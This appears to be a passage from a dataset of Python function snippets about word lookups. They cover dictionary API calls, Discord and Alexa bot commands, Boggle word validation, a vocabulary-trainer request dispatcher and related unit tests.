curr_word\n\n try:\n synonyms = http_get(curr_word, True)\n\n if type(synonyms[0]) == dict:\n speech = (\"A synonym for {} is {}\".format(curr_word,\n synonyms[0]['meta']['syns'][0][0]))\n synonym_list = synonyms[0]['meta']['syns'][0]\n reprompt = (\"What word would you like a synonym for?\")\n else:\n speech = (\"No synonyms for {} are available. \"\n \"Can I look up another word?\").format(curr_word)\n reprompt = (\"What word would you like a synonym for?\")\n except:\n speech = (\"No synonyms for {} are available. \"\n \"Can I look up another word?\").format(curr_word)\n reprompt = (\"What word would you like a synonym for?\")\n else:\n speech = \"I'm not sure what word to find a synonym for, please try again\"\n reprompt = (\"I didn't catch that. 
What word would you like me \"\n \"me to look up a synonym for?\")\n\n handler_input.attributes_manager.session_attributes[previous_key] = speech\n handler_input.response_builder.speak(speech).ask(reprompt)\n return handler_input.response_builder.response", "def score_word():\n data = request.json\n user_word = data['word'].upper()\n game_id = data['game_id']\n current_game = games[game_id]\n\n print(\"checking word\", games)\n \n if not current_game.is_word_in_word_list(user_word): # true/false\n result = \"not-word\"\n elif not current_game.check_word_on_board(user_word): # true/false\n result = \"not-on-board\"\n else:\n result = \"ok\"\n \n\n return jsonify(result=result)", "def guess():\n word = request.args[\"word\"]\n board = session[\"board\"]\n\n # create response by the response of the function if word is valid\n response = boggle_game.check_valid_word(board, word)\n\n return jsonify({'result': response})", "def lookup_word(word):\n\n return API.get_response(word)", "def validate_word(word: str) -> bool:\n if word:\n url = f'{OXFORD_DICT_BASE_URL}{OXFORD_DICT_ENTRY_URL}/en-us/{word.lower()}'\n headers = {\n 'app_id': settings.OXFORD_APP_ID,\n 'app_key': settings.OXFORD_API_KEY,\n }\n\n logger.info(f'validating {word} against oxford dictionary...')\n response = requests.get(\n url,\n headers=headers,\n )\n\n if response.status_code == status.HTTP_200_OK:\n return True\n else:\n return False\n\n return False", "def __call__(self, word):\n return self.parse_request(self.request(f\"https://www.dictionaryapi.com/api/v3/references/collegiate/json/{word}?key={self.apikey}\"), word)", "def definition(request, word_to_lookup):\n return render(request, 'definition.html')", "def search_word(word : str = typer.Argument(..., help=\"Searches the trie if the word exists\")):\n response_url = url + \"/search/\" + word\n response = requests.get(response_url)\n typer.echo(response.json()[\"status\"])", "def wordInfo(self, input_word):\n return self.app.get('/words/1.0/info/' + input_word, follow_redirects=True, headers=self.headers)", "def get_response(self, word: str):\n lkup = self.get_lookup_segments(word)\n lkup_url = self.url + lkup\n\n res = requests.request(\"GET\", lkup_url, headers=self.headers)\n\n if res.status_code == 200:\n return res.json()['definitions']\n else:\n raise NetworkError()", "def add_word(word : str = typer.Argument(..., help=\"Adds a word into the trie\")):\n response_url = url + \"/add-word/\" + word\n response = requests.post(response_url)\n # typer.echo(response.status_code)\n typer.echo(response.json()[\"status\"])", "def distribute_actions(jo):\n\n # check if valid session\n\n # check login\n\n log.log_info(\"in distribute_actions\")\n\n rj = {}\n result = \"\"\n \n action = jo[\"action\"]\n\n log.log_info(\"action is: \" + str(action))\n\n if action == \"addOneWord\":\n\n session = jo[\"session\"]\n\n elif action == \"addText\": # todo: is this anywhere used ???\n\n text = jo[\"text\"]\n language = jo[\"language\"] # the input language\n\n elif action == \"adVocFromUrl\":\n\n log.log_info(\"in distribute_actions adVocFromUrl\")\n\n session = jo[\"session\"]\n user_id = dbs.get_user_id_from_session(session)\n\n time_stamp = int(time.time())\n\n dbac.add_one_word_txt(user_id, jo[\"language\"], jo[\"word\"], jo[\"translationLanguage\"], jo[\"translationWord\"], True, \"\", \"\", time_stamp)\n dbac.add_one_word_txt(user_id, jo[\"translationLanguage\"], jo[\"translationWord\"], jo[\"language\"], jo[\"word\"], False, \"\", \"\", time_stamp)\n\n# now test if it arrived\n 
log.log_info(\"in distribute_actions preparing response\")\n \n rj['action'] = \"adVocFromUrl\"\n rj['result'] = \"successfully inserted \"\n \n result = json.dumps(rj)\n\n elif action == \"loadWord\": # ATTENTION !!! this is probably not used anymore !!!\n\n log.log_logic(\" \")\n log.log_logic(\" \")\n log.log_logic(\" \")\n log.log_logic(\"===============================================================================\")\n log.log_logic(\"=========================== ROUTE loadWord ====================================\")\n log.log_logic(\"===============================================================================\")\n\n log.log_info(\"loading new word\")\n log.log_info(jo)\n\n wordId = jo[\"wordId\"]\n answer = jo[\"answer\"]\n session = jo[\"session\"]\n\n log.log_info(\"answer was \" + answer)\n log.log_info(\"wordId was \" + str(wordId))\n log.log_info(\"session was \" + str(session))\n\n user_id = dbs.get_user_id_from_session(session)\n\n log.log_info(\"user_id is \" + str(user_id))\n\n success, experiment, once_learned = dbl.process_answer(str(wordId), user_id, answer)\n\n log.log_info(\"process_answer done -------------------------------\")\n\n new_id = dbl.get_next_word_id(user_id, str(wordId))\n\n log.log_info(\"get_next_word_id done\")\n\n id, l1, w1, l2, w2 = dbl.get_word(new_id)\n\n #get a random word from the words already learned\n learned_id = dbl.get_learned_random(user_id)\n rnd_id, rnd_l1, rnd_w1, rnd_l2, rnd_w2 = dbl.get_word(learned_id)\n\n rj['action'] = action\n rj[\"wordId\"] = id\n rj[\"language1\"] = dbac.get_language_label(l1)\n rj[\"word1\"] = w1\n rj[\"language2\"] = dbac.get_language_label(l2)\n rj[\"word2\"] = w2\n rj['error'] = False\n rj['error_description'] = \"\"\n rj['success'] = success\n rj['experiment'] = experiment\n rj['once_learned'] = once_learned\n\n rj[\"rnd_wordId\"] = rnd_id\n rj[\"rnd_language1\"] = dbac.get_language_label(rnd_l1)\n rj[\"rnd_word1\"] = rnd_w1\n rj[\"rnd_language2\"] = dbac.get_language_label(rnd_l2)\n rj[\"rnd_word2\"] = rnd_w2\n rj[\"rnd_frequency\"] = 15 #todo: convert to algorithm depending on % learned and size of vocabulary\n\n\n result = json.dumps(rj)\n\n log.log_info(\"distribute_actions(jo) result for new word \" + result)\n\n elif action == \"loadWordArray\":\n\n log.log_logic(\" \")\n log.log_logic(\" \")\n log.log_logic(\" \")\n log.log_logic(\"===============================================================================\")\n log.log_logic(\"=========================== ROUTE loadWordArray ====================================\")\n log.log_logic(\"===============================================================================\")\n\n log.log_info(\"loading new word array\")\n log.log_info(jo)\n\n wordId = jo[\"wordId\"]\n answer = jo[\"answer\"]\n session = jo[\"session\"]\n\n log.log_info(\"answer was \" + answer)\n log.log_info(\"wordId was \" + str(wordId))\n log.log_info(\"session was \" + str(session))\n\n if len(str(wordId).strip()) > 0:\n\n xxxx, yyyy, w1, zzzz, w2 = dbl.get_word(wordId)\n\n log.log_logic(\"answer was \" + answer)\n log.log_logic(\"wordId was \" + str(wordId))\n log.log_logic(\"w1 was \" + str(w1))\n log.log_logic(\"w2 was \" + str(w2))\n\n user_id = dbs.get_user_id_from_session(session)\n\n log.log_info(\"user_id is \" + str(user_id))\n\n # January 2019 we change this logic now using a ordered list avoiding random\n #success, experiment, once_learned = dbl.process_answer(str(wordId), user_id, answer)\n success, experiment, once_learned = dbl.process_answer_with_sorted_array(str(wordId), 
user_id, answer)\n\n log.log_logic(\"was experiment? \" + str(experiment))\n log.log_logic(\"was success? \" + str(success))\n log.log_logic(\"once learned? \" + str(once_learned))\n log.log_logic(\"***** processing uf user answer done, now prepare response *****\")\n\n # January 2019 trying out a new algorithm using a logic that does not use random, but ordered by logic\n #new_id_array = dbl.get_next_word_id_array(user_id, str(wordId))\n\n new_id_array = dbl.get_next_word_id_array_ordered_position(user_id, str(wordId))\n\n word_arr = []\n # ToDo: this is here very inefficient code that creates a lot of traffic on database. Integrate in previous function call\n for new_id in new_id_array:\n\n row_j = {}\n id, l1, w1, l2, w2 = dbl.get_word(new_id[0])\n row_j[\"wordId\"] = id\n row_j[\"language1\"] = dbac.get_language_label(l1)\n row_j[\"word1\"] = w1\n row_j[\"language2\"] = dbac.get_language_label(l2)\n row_j[\"word2\"] = w2\n row_j[\"position\"] = new_id[1]\n\n log_str = str(row_j[\"wordId\"]) + \", \"\n log_str += str(row_j[\"position\"]) + \", \"\n log_str += str(row_j[\"word1\"]) + \", \"\n log_str += str(row_j[\"word2\"]) + \", \"\n\n log.log_logic(log_str)\n\n word_arr.append(row_j)\n\n rj['action'] = action\n rj['error'] = False\n rj['error_description'] = \"\"\n rj['success'] = success\n rj['bucket-sizes'] = 3\n rj['bucket-distribution'] = [0.6, 0.9]\n rj['experiment'] = experiment\n rj['once_learned'] = once_learned\n rj[\"words\"] = word_arr\n\n log.log_logic(\"sending to client success = \" + str(success))\n log.log_logic(\"sending to client experiment = \" + str(experiment))\n\n # get a random word from the words already learned\n # this is to repeat words and to create a better training set\n learned_id = dbl.get_learned_random(user_id)\n rnd_id, rnd_l1, rnd_w1, rnd_l2, rnd_w2 = dbl.get_word(learned_id)\n\n rj[\"rnd_wordId\"] = rnd_id\n rj[\"rnd_language1\"] = dbac.get_language_label(rnd_l1)\n rj[\"rnd_word1\"] = rnd_w1\n rj[\"rnd_language2\"] = dbac.get_language_label(rnd_l2)\n rj[\"rnd_word2\"] = rnd_w2\n rj[\"rnd_frequency\"] = 10 #todo: convert to algorithm depending on % learned and size of vocabulary\n\n log.log_logic(\"sending to client extra random word: \" + rnd_w1 + \" == \" + rnd_w2)\n\n result = json.dumps(rj)\n\n log.log_info(\"distribute_actions(jo) result for new word \" + result)\n\n elif action == \"editWord\":\n\n session = jo[\"session\"]\n log.log_info(\"session was \" + str(session))\n user_id = dbs.get_user_id_from_session(session)\n\n fromWord = jo[\"fromWord\"]\n toWord = jo[\"toWord\"]\n word_id = jo[\"wordId\"]\n\n dbc.update_word_by_id(user_id, fromWord, toWord, word_id)\n\n log.log_info(\"update word done\")\n\n rj['action'] = action\n rj['error'] = False\n rj['error_description'] = \"\"\n\n result = json.dumps(rj)\n\n elif action == \"report\":\n\n session = jo[\"session\"]\n log.log_info(\"session was \" + str(session))\n user_id = dbs.get_user_id_from_session(session)\n\n new_words, learned_words, ratio_learned = dbr.get_simple_report(user_id)\n c1, c2, c3, c4 = dbr.get_report_charts(user_id)\n\n log.log_info(\"c1 = \" + str(c1))\n log.log_info(\"c2 = \" + str(c2))\n log.log_info(\"c3 = \" + str(c3))\n log.log_info(\"c4 = \" + str(c4))\n\n log.log_info(\"done getting data for charts\")\n\n rj['action'] = action\n rj['newWords'] = new_words\n rj['learnedWords'] = learned_words\n rj['ratioLearned'] = ratio_learned\n rj['c1'] = c1\n rj['c2'] = c2\n rj['c3'] = c3\n rj['c4'] = c4\n rj['html'] = \"\"\n rj['error'] = False\n rj['error_description'] = 
\"\"\n\n log.log_info(\"converting to json\")\n\n try:\n result = json.dumps(rj)\n except Exception as ex:\n log.log_error(\"error in making report: \" + str(ex))\n rj = {}\n rj['action'] = action\n rj['error'] = True\n rj['error_description'] = \"error in making report: \" + str(ex)\n result = json.dumps(rj)\n\n log.log_info(\"distribute_actions(jo) result for report = \" + result)\n\n elif action == \"readerSaveText\":\n\n session = jo[\"session\"]\n log.log_info(\"session was \" + str(session))\n user_id = dbs.get_user_id_from_session(session)\n # user_id, language, url, text\n rj['text_id'], err = db_reader.save_text(user_id, jo[\"language\"], jo[\"url\"], jo[\"text\"])\n rj['action'] = action\n if len(err) > 0:\n rj['error'] = True\n rj['error_description'] = err\n else:\n rj['error'] = False\n rj['error_description'] = \"\"\n result = json.dumps(rj)\n\n elif action == \"readerLoadTextTitles\":\n\n session = jo[\"session\"]\n log.log_info(\"session was \" + str(session))\n user_id = dbs.get_user_id_from_session(session)\n rj['titles'] = db_reader.get_text_titles(user_id)\n rj['action'] = action\n rj['error'] = False\n rj['error_description'] = \"\"\n result = json.dumps(rj)\n\n elif action == \"readerLoadOneText\":\n\n session = jo[\"session\"]\n log.log_info(\"session was \" + str(session))\n user_id = dbs.get_user_id_from_session(session)\n rj['text'], rj['text_id'] = db_reader.get_one_text(jo[\"id\"], user_id)\n rj['action'] = action\n rj['error'] = False\n rj['error_description'] = \"\"\n result = json.dumps(rj)\n\n elif action == \"readerSetTextRead\":\n\n session = jo[\"session\"]\n log.log_info(\"session was \" + str(session))\n user_id = dbs.get_user_id_from_session(session)\n db_reader.set_text_read(jo[\"id\"], user_id)\n rj['action'] = action\n rj['error'] = False\n rj['error_description'] = \"\"\n result = json.dumps(rj)\n\n elif action == \"logIn\":\n\n # login and create session\n user = jo[\"user\"].strip()\n password = jo[\"password\"].strip()\n rj['action'] = \"logIn\"\n\n password = password.strip()\n password = password.replace(\" \", \"\")\n\n user = user.lower()\n user = user.strip()\n user = user.replace(\" \", \"\")\n\n if dbs.check_login(user, password) > 0:\n rj['success'] = True\n rj['result'] = \"success\"\n rj['session'] = dbs.make_save_session(user)\n\n # we need to register the session in the MASTER's database\n register_user_and_session_at_master(rj['session'], user)\n\n\n else:\n rj['success'] = False\n rj['result'] = \"failure\"\n rj['session'] = \"\"\n\n log.log_info(\"result - \" + str(rj))\n result = json.dumps(rj)\n\n elif action == \"logout\":\n\n # ToDo\n # logfiles out by destroying session and or cookie?\n\n session = jo[\"session\"]\n\n elif action == \"checkSession\":\n\n # check if session is valid\n session = jo[\"session\"]\n rj['action'] = \"checkSession\"\n\n if dbs.check_session(session) > 0:\n log.log_info(\"valid session \" + session)\n rj['sessionValid'] = True\n else:\n log.log_info(\"invalid session \" + session)\n rj['sessionValid'] = False\n\n result = json.dumps(rj)\n\n elif action == \"getLanguages\":\n\n rj['action'] = action\n\n rj['labels'] = [\"English\", \"German\", \"Russian\", \"Franch\", \"Italian\", \"Spanish\", \"Portuguese\"]\n rj['values'] = [\"english\", \"german\", \"russian\", \"franch\", \"italian\", \"spanish\", \"portuguese\"]\n\n rj['error'] = False\n rj['error_description'] = \"\"\n\n result = json.dumps(rj)\n\n elif action == \"resetPassword\":\n\n rj['action'] = action\n\n # ToDo\n # reset password and send 
new password to user by email\n\n user = jo[\"user\"]\n user = user.lower()\n user = user.strip()\n user = user.replace(\" \", \"\")\n\n if dbs.check_user(user) > 0:\n p = dbs.random_string_simple(6)\n dbs.update_password(user, p)\n # ToDo: put in a separate thread to prevent slow down of process\n # ToDo: make nice test in mail\n email_sender.send_mail(user, \"resetPassword\", \"Password: \" + p)\n rj['result'] = \"success\"\n rj['success'] = True\n log.log_info(\"success in resetting password for \" + user)\n else:\n rj['result'] = \"failure\"\n rj['success'] = False\n log.log_info(\"failure in resetting password because user not existing \" + user)\n\n result = json.dumps(rj)\n\n elif action == \"registerUser\":\n\n rj['action'] = action\n\n # ToDo\n # reset password and send new password to user by email\n\n user = jo[\"user\"]\n user = user.lower()\n user = user.strip()\n user = user.replace(\" \", \"\")\n\n if dbs.check_user(user) < 1:\n\n p = dbs.random_string_simple(4)\n dbs.register_user(user, p)\n\n # ToDo: put in a separate thread to prevent slow down of process\n # ToDo: make nice test in mail\n email_sender.send_mail(user, \"registerUser\", \"password: \" + p)\n\n # wwe need to inform the MASTER about the registration.\n register_user_and_session_at_master(\"\", user)\n\n log.log_info(\"registering user \" + user)\n\n rj['result'] = \"success\"\n rj['success'] = True\n else:\n\n log.log_info(\"user already exists: \" + user)\n\n rj['result'] = \"failure\"\n rj['success'] = False\n\n result = json.dumps(rj)\n\n elif action == \"getSettings\":\n\n session = jo[\"session\"]\n\n rj['action'] = action\n rj['settings'] = settings.get_settings(session)\n rj['result'] = \"success\"\n rj['success'] = True\n\n result = json.dumps(rj)\n\n elif action == \"setSettings\":\n\n session = jo[\"session\"]\n\n data = jo[\"settings\"]\n settings.set_settings(session, data)\n\n rj['action'] = action\n rj['result'] = \"success\"\n rj['success'] = True\n\n result = json.dumps(rj)\n\n elif action == \"bulkAddVoc\":\n\n table_text = jo[\"text\"]\n\n session = jo[\"session\"]\n log.log_info(\"session was \" + str(session))\n user_id = dbs.get_user_id_from_session(session)\n\n dbac.add_words_bulk(user_id, table_text)\n\n rj['action'] = action\n rj['result'] = \"success\"\n rj['success'] = True\n\n result = json.dumps(rj)\n\n else:\n # then we have a problem because we do not know the request and we need to throw an error\n log.log_error(\"unknown method for processing JSON\")\n xxx = 111\n\n return result", "def test_word_info_bad_request(self):\n word = \"defination of vitality \"\n rv = self.wordInfo(input_word=word)\n expected_output = {\n \"code\": 400,\n \"message\": \"A Term must be only a single word\"\n }\n response_data = json.loads(rv.get_data(as_text=True))\n\n self.assertEquals(rv.status_code, 400)\n self.assertEquals(response_data[\"code\"], expected_output[\"code\"])\n self.assertEquals(response_data[\"message\"], expected_output[\"message\"])", "def word():\n\n word = Word(random_word())\n # word = Word(\"arroyo\")\n\n word.speak()\n word.messup()\n l.debug(\"Displaying %s\", word.word)\n\n prons = sorted([word.word, word.word + \"-a\", word.word + \"-b\", word.word + \"-c\"], key=lambda x: random.random())\n\n return jsonify({\"word\": word.word, \"pron\": prons, \"correct\": prons.index(word.word)})", "def test_word_info_bad_word(self):\n word = \"hdiasudhisuahdiasushdiaushdiaushdiasuhdisauh\"\n rv = self.wordInfo(input_word=word)\n expected_output = {\n word: {\n \"frequency\": 
None,\n \"defination\": None,\n \"antonyms\": None,\n \"examples\": None,\n \"pronounciation\": None,\n \"synonyms\": None\n }\n }\n response_data = json.loads(rv.get_data(as_text=True))\n\n self.assertEquals(rv.status_code, 200)\n self.assertEquals(response_data[word][\"defination\"], expected_output[word][\"defination\"])\n self.assertEquals(response_data[word][\"antonyms\"], expected_output[word][\"antonyms\"])\n self.assertEquals(response_data[word][\"examples\"], expected_output[word][\"examples\"])\n self.assertEquals(response_data[word][\"frequency\"], expected_output[word][\"frequency\"])\n self.assertEquals(response_data[word][\"pronounciation\"], expected_output[word][\"pronounciation\"])\n self.assertEquals(response_data[word][\"synonyms\"], expected_output[word][\"synonyms\"])", "def post(self):\n data = request.json\n return check_spelling(data)", "def urban_dict(word):\n\n url = \"https://mashape-community-urban-dictionary.p.rapidapi.com/define\"\n\n querystring = {}\n\n querystring[\"term\"] = word\n\n headers = config.headers\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n print(response.text)", "async def dict(self, ctx, *keywords):\n\n if not keywords:\n embed = discord.Embed(title='{}:'.format(ctx.message.author.name),\n description='Did you tried `{}help dict` yet?'.format(self.config['prefix']),\n colour=0xf20006)\n a = await self.bot.say(embed=embed)\n await self.bot.add_reaction(a, self.emojiUnicode['error'])\n return\n if keywords:\n old_keyword = \" \".join(keywords)\n try:\n keywords = \"%20\".join(keywords)\n url = 'http://api.urbandictionary.com/v0/define?term={}'.format(keywords)\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n source = await response.json(encoding='utf8')\n\n source = json.dumps(source, indent=2)\n result = json.loads(str(source))\n embed = discord.Embed(title='{}:'.format(ctx.message.author.name),\n description='Your search tag was:\\n***`{}`***'.format(old_keyword),\n colour=0xf20006)\n embed.add_field(name='Word:', value='`{}`'.format(result['list'][0]['word']), inline=False)\n embed.add_field(name='Definition:', value='```{}```'.format(result['list'][0]['definition']), inline=False)\n embed.add_field(name='example:', value='```{}```'.format(result['list'][0]['example']), inline=True)\n embed.add_field(name='Author:', value='`{}`'.format(result['list'][0]['author']), inline=False)\n embed.add_field(name='Link:', value='{}'.format(result['list'][0]['permalink']), inline=False)\n embed.add_field(name='Likes:', value='\\U0001f44d `{}`'.format(result['list'][0]['thumbs_up']),\n inline=True)\n embed.add_field(name='Dislikes:', value='\\U0001f44e `{}`'.format(result['list'][0]['thumbs_down']),\n inline=True)\n\n\n a = await self.bot.say(embed=embed)\n await self.bot.add_reaction(a, self.emojiUnicode['succes'])\n except Exception as e:\n embed = discord.Embed(title='{}:'.format(ctx.message.author.name),\n description='Your search tag was:\\n***`{}`***\\n\\nNothing found :sailboat:'.format(old_keyword, self.config['prefix']),\n colour=0xf20006)\n a = await self.bot.say(embed=embed)\n await self.bot.add_reaction(a, self.emojiUnicode['warning'])", "def create_validation_function(name_of_slot):\n def validate_slot(\n self,\n value: Text,\n dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any],\n ) -> Dict[Text, Any]:\n \"\"\"Validate user input.\"\"\"\n\n if value.lower() in self.answers_db()[name_of_slot]:\n # validation succeeded, set the 
value of the slot to \n # user-provided value\n return {name_of_slot: value}\n else:\n # find the closest answer by some measure (edit distance?)\n choices = self.answers_db()[name_of_slot]\n answer = process.extractOne(value.lower(), choices)\n\n # check to see if distnace is greater than some threshold\n if answer[1] < 45:\n # if so, set slot to \"other\"\n return {name_of_slot: \"other\"}\n else:\n return {name_of_slot: answer[0]}\n \n return(validate_slot)", "def submit_definition():\n if request.method == \"POST\":\n game = mongo.db.games.find_one(\n {\"game_name\": request.form.get(\"game_name\")})\n user = mongo.db.users.find_one({\"username\": session[\"user\"]})\n today = date.today()\n submission_date = today.strftime(\"%Y/%m/%d\")\n definition = {\n \"term_header\": request.form.get(\"term_header\").upper(),\n \"game_fk\": game['_id'],\n \"short_definition\": request.form.get(\"short_definition\"),\n \"long_description\": request.form.get(\"long_description\", False),\n \"youtube_link\": request.form.get(\"youtube_link\", False),\n \"submitted_by\": user[\"_id\"],\n \"submission_date\": submission_date,\n \"rating\": 1,\n \"upvoted_by\": [user[\"_id\"]],\n \"downvoted_by\": []\n }\n mongo.db.terms.insert_one(definition)\n updateUserRating(definition, 1)\n flash(f\"Thank you, {session['user']}, for your submission\",\n category=\"success\")\n return redirect(url_for(\"get_terms\"))\n try:\n # Ensure that user is logged in before displaying page\n if session[\"user\"]:\n games = mongo.db.games.find().sort(\"game_name\", 1)\n return render_template(\"add_term.html\", games=games)\n except KeyError:\n # Redirect user to homepage if not logged in\n flash(Markup(\"Please <a href='login'>\"\n \"login</a> or <a href='register'>\"\n \"register</a> to add a new definition\"), category=\"error\")\n return redirect(url_for(\"get_terms\"))", "async def cmd_define(\n self,\n args: Args,\n src: Src,\n _language: str = None,\n _l: str = None,\n _etymology: int = None,\n _e: int = None,\n **_,\n ):\n if not args:\n return \"Wiktionary, the Free Dictionary\\nhttps://en.wiktionary.org/\"\n word = args[0]\n self.log.f(\"dict\", \"Query string: \" + word)\n\n async with src.channel.typing():\n which = _etymology or _e or 0\n\n ref = Define(word, _language or _l, which)\n url = \"https://en.wiktionary.org/wiki/\" + word\n if ref.valid:\n em = discord.Embed(color=0xF8F9FA)\n em.set_author(\n name=\"'{}' on Wiktionary ({} etymolog{} available)\".format(\n word, ref.alts, \"y\" if ref.alts == 1 else \"ies\"\n ),\n url=url,\n icon_url=\"https://upload.wikimedia.org/wikipedia/en/thumb/8/80/Wikipedia-logo-v2.svg/1122px-Wikipedia-logo-v2.svg.png\",\n )\n em.add_field(name=\"Etymology\", value=ref.etymology, inline=False)\n for definition in ref.definitions:\n em.add_field(\n name=\"`{}` ({}):\".format(word, definition[\"partOfSpeech\"]),\n value=\"\\n- \".join(\n [\n text\n for text in definition[\"text\"]\n if not re.search(r\"^\\(.*vulgar.*\\)\", text.lower())\n ]\n ),\n inline=False,\n )\n\n return em\n else:\n raise CommandOperationError(\"No definition found.\")", "def process_action(action, params, context):\n if action == 'define_word':\n word = params.get('word')\n if word is None:\n return make_simple_reply('I do not know this word')\n word_id = normalize_word(word)\n word_model = ndb.Key('Word', word_id).get()\n if word_model is not None:\n word_model.practice_count += 1\n word_model.learned = False\n word_model.put()\n return generate_definition_reply(word_model)\n \n word_model = Word()\n 
word_model.learned = False\n word_model.word = word\n word_model.key = ndb.Key('Word', word_id)\n if not get_word_definition(word_model):\n return make_simple_reply('I do not know this word')\n else:\n word_model.practice_count = 1\n word_model.put()\n return generate_definition_reply(word_model)\n \n elif action == 'practice':\n keys = Word.query().filter(Word.learned == False).fetch(keys_only=True)\n selected_word_key = random.sample(keys, 1)[0]\n reply = make_simple_reply(\n 'How about %s! Do you remember it?' % selected_word_key.get().word)\n reply['context'] = [{\n 'name': 'practice',\n 'lifespan': 2,\n 'parameters': {'word_id': selected_word_key.id()}\n }]\n return reply\n \n elif action == 'practice_known':\n # User knows this word. Mark it as learned\n word_id = context.get('practice', {}).get('word_id', None)\n reset_context = [{\n 'name': 'practice',\n 'lifespan': 0,\n 'parameters': {'word_id': word_id}\n }]\n\n if word_id is None:\n reply = make_simple_reply('I am afraid I do not know this word')\n reply['context'] = reset_context\n return reply\n\n word_model = ndb.Key('Word', word_id).get()\n if word_model is None:\n reply = make_simple_reply('I am afraid I do not know this word')\n reply['context'] = reset_context\n return reply\n\n word_model.learned = True\n word_model.put()\n reply = make_simple_reply('OK, I will not ask this word again')\n reply['context'] = reset_context\n return reply\n \n elif action == 'practice_unknown':\n # User does not know this word. Return its definition\n word_id = context.get('practice', {}).get('word_id', None)\n reset_context = [{\n 'name': 'practice',\n 'lifespan': 0,\n 'parameters': {'word_id': word_id}\n }]\n\n if word_id is None:\n reply = make_simple_reply('I do not know this word either, sorry')\n reply['context'] = reset_context\n return reply\n\n word_model = ndb.Key('Word', word_id).get()\n if word_model is None:\n reply = make_simple_reply('I do not know this word either, sorry')\n reply['context'] = reset_context\n return reply\n\n word_model.practice_count += 1\n word_model.learned = False\n word_model.put()\n reply = generate_definition_reply(word_model)\n reply['context'] = reset_context\n return reply\n \n return make_simple_reply('I did not get that')", "async def ud(self,word):\r\n defs = ud.define(word)\r\n for d in defs:\r\n await self.bot.say(d)", "def getWord(wordType):\n if (wordType == ADJECTIVE) or (wordType == ADJECTIVE):\n newWord = input('Enter an ' + wordType.lower() + \":\\n\")\n return newWord\n else:\n newWord = input('Enter a ' + wordType.lower() + \":\\n\")\n return newWord", "def choose_word():\n pass", "def define(update, context):\n word = update.message.text\n output = make_output(word)\n if output:\n response_message = output\n else:\n response_message = 'Sorry, I was unable to complete that request.'\n context.bot.send_message(\n chat_id=update.effective_chat.id, text=response_message)", "def spellcheck():\n text = request.args.get('text', '')\n words = {}\n for word in text.split():\n words[word] = Word(word).spellcheck()\n return jsonify(**words)", "async def define(self, interaction: Interaction, args: str):\n baseurl = \"https://www.merriam-webster.com/dictionary/\"\n output = args\n await interaction.response.send_message(baseurl + output)", "def is_validword(word, hand, word_list1):\n # TO DO ... 
<-- Remove this comment when you code this function\n word_list = []\n cnt_1 = 0\n for i in word:\n word_list += i.split(\",\")\n for i in word_list:\n if i in hand.keys():\n cnt_1 += 1\n if cnt_1 == len(word) and word in word_list1:\n score = get_word_score(word, n_num)\n update_hand(hand, word)\n else:\n print(\"Invalid Word\")", "def launch_request_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech = \"Welcome to the Merriam-Webster Dictionary. What word can I look up for you?\"\n reprompt = \"You can say: definition of word, example of word, or synonym of word.\"\n\n handler_input.response_builder.speak(speech).ask(reprompt)\n return handler_input.response_builder.response", "def create(self, request, *args, **kwargs):\n message = self.check_word_id()\n if message is not None:\n return Response(message, status=status.HTTP_400_BAD_REQUEST)\n return super(Definition, self).create(request, *args, **kwargs)", "async def jisho(self, ctx, word: str):\r\n search_args = await self.dict_search_args_parse(ctx, word.lower())\r\n if not search_args:\r\n return\r\n limit, query = search_args\r\n message = urllib.parse.quote(query, encoding='utf-8')\r\n url = \"http://jisho.org/api/v1/search/words?keyword=\" + message\r\n async with self.session.get(url) as response:\r\n data = await response.json()\r\n try:\r\n messages = [self.parse_data(result) for result in data[\"data\"][:limit]]\r\n except KeyError:\r\n return await ctx.send(\"I was unable to retrieve any data\")\r\n try:\r\n await ctx.send('\\n'.join(messages))\r\n except discord.HTTPException:\r\n await ctx.send(\"No data for that word.\")", "def urban_dictionary (self, xmpp_message, room, nick, term):\n\n # term is required.\n if not term:\n return\n\n URL = \"http://api.urbandictionary.com/v0/define?term=%s\"\n HDRS = { \"Host\" : \"api.urbandictionary.com\" }\n\n try:\n data = requests.get(URL % requests.utils.quote(term), headers=HDRS).content\n data = simplejson.loads(helpers.sanitize(data))\n except:\n return \"(facepalm) sorry. 
I encounted an error.\"\n\n # pick a random definision.\n try:\n ud = random.choice(data[\"list\"])\n return [ud[\"permalink\"], \"%s\\nExample: %s\" % (ud[\"definition\"], ud[\"example\"])]\n except:\n return \"No definition found for '%s'\" % term", "def GetWord(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def getWord(self, word, useCanonical=None, includeSuggestions=None, ):\n\n # Parse inputs\n resourcePath = '/word.{format}/{word}'\n resourcePath = resourcePath.replace('{format}', 'json')\n method = 'GET'\n\n queryParams = {}\n headerParams = {}\n\n queryParams['useCanonical'] = self.apiClient.toPathValue(useCanonical)\n queryParams['includeSuggestions'] = self.apiClient.toPathValue(includeSuggestions)\n\n\n if word != None:\n resourcePath = resourcePath.replace('{word}', word)\n\n\n # Make the API Call\n response = self.apiClient.callAPI(resourcePath, method, queryParams,\n None, headerParams)\n if not response:\n return None\n\n # Create output objects if the response has more than one object\n responseObject = self.apiClient.deserialize(response,\n model.WordObject.WordObject)\n return responseObject", "async def ud(self, ctx, *, string):\n\n link = '+'.join(string.split())\n async with aiohttp.ClientSession() as session:\n async with session.get(\"http://api.urbandictionary.com/v0/define?term=\" + link) as resp:\n json_data = await resp.json()\n definition = json_data['list']\n\n if len(definition) > 1:\n p = []\n number = 0\n for i in definition:\n number += 1\n p.append(func.ud_embed(i, number, len(definition)))\n await SimplePaginator(extras=p).paginate(ctx)\n else:\n await ctx.send(embed=func.ud_embed(definition[0], 1, 1))", "def query_word(self, word):\n raise NotImplementedError", "def createSpecial():\r\n global CurrentState\r\n global CurrentInput\r\n global RESPONSEOPTIONS\r\n response = input(\"Enter response:\")\r\n api = input(\"Enter api (e.g. 'internet'):\")\r\n command = input(\"Enter command (e.g. 
